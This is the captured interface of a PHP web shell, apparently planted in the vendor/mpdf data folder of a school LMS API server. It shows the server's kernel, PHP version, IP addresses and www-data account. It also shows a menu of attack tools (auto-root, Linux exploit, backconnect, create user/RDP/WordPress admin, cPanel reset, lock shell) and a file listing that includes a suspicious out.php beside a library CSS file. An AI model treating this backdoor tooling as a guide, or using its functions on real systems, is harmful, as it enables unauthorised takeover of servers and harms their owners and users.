Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
api.lmsschool /
vendor /
mpdf /
mpdf /
data /
[ HOME SHELL ]
Name
Size
Permission
Action
collations
[ DIR ]
drwxr-xr-x
font
[ DIR ]
drwxr-xr-x
iccprofiles
[ DIR ]
drwxr-xr-x
patterns
[ DIR ]
drwxr-xr-x
CJKdata.php
6.43
KB
-rw-r--r--
entity_substitutions.php
4.42
KB
-rw-r--r--
lang2fonts.css
8.91
KB
-rw-r--r--
linebrdictK.dat
1
MB
-rw-r--r--
linebrdictL.dat
123.96
KB
-rw-r--r--
linebrdictT.dat
294.68
KB
-rw-r--r--
mpdf.css
2.06
KB
-rw-r--r--
no_image.jpg
7.7
KB
-rw-r--r--
out.php
2.18
KB
-rw-r--r--
subs_core.php
5.56
KB
-rw-r--r--
subs_win-1252.php
8.28
KB
-rw-r--r--
upperCase.php
13.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mpdf.css
/* LISTS */ /* A default margin-top/bottom for lists is NOT set in config.php - (standard browsers give outermost list a top and bottom margin). [mPDF default CSS set in configuration only works on basic elements, cannot do selectors such as "ol ol"] Need to add the following to do this, but also prevent margins in nested lists as per default HTML in most browsers: */ ul, ol { margin-top: 0.83em; margin-bottom: 0.83em; } ul ul, ul ol, ol ul, ol ol { margin-top: 0; margin-bottom: 0; } /* INDEXES */ div.mpdf_index_main { font-family: sans-serif; line-height: normal; } div.mpdf_index_entry { line-height: normal; text-indent: -1.5em; } div.mpdf_index_letter { font-family: sans-serif; font-size: 1.8em; font-weight: bold; line-height: normal; text-transform: uppercase; page-break-after: avoid; margin-top: 0.3em; margin-collapse: collapse; } a.mpdf_index_link { color: #000000; text-decoration: none; } /* TABLE OF CONTENTS */ div.mpdf_toc { font-family: sans-serif; line-height: normal; } a.mpdf_toc_a { text-decoration: none; color: black; } div.mpdf_toc_level_0 { /* Whole line level 0 */ line-height: 1.5; margin-left: 0; padding-right: 0em; /* should match the outdent specified for ToC; 0 is default; suggested value 2em */ } span.mpdf_toc_t_level_0 { /* Title level 0 - may be inside <a> */ font-weight: bold; } span.mpdf_toc_p_level_0 { /* Page no. level 0 - may be inside <a> */ } div.mpdf_toc_level_1 { /* Whole line level 1 */ margin-left: 2em; text-indent: -2em; padding-right: 0em; /* should match the outdent specified for ToC; 0 is default; suggested value 2em */ } span.mpdf_toc_t_level_1 { /* Title level 1 */ font-style: italic; font-weight: bold; } span.mpdf_toc_p_level_1 { /* Page no. level 1 - may be inside <a> */ } div.mpdf_toc_level_2 { /* Whole line level 2 */ margin-left: 4em; text-indent: -2em; padding-right: 0em; /* should match the outdent specified for ToC; 0 is default; suggested value 2em */ } span.mpdf_toc_t_level_2 { /* Title level 2 */ } span.mpdf_toc_p_level_2 { /* Page no. level 2 - may be inside <a> */ }
Close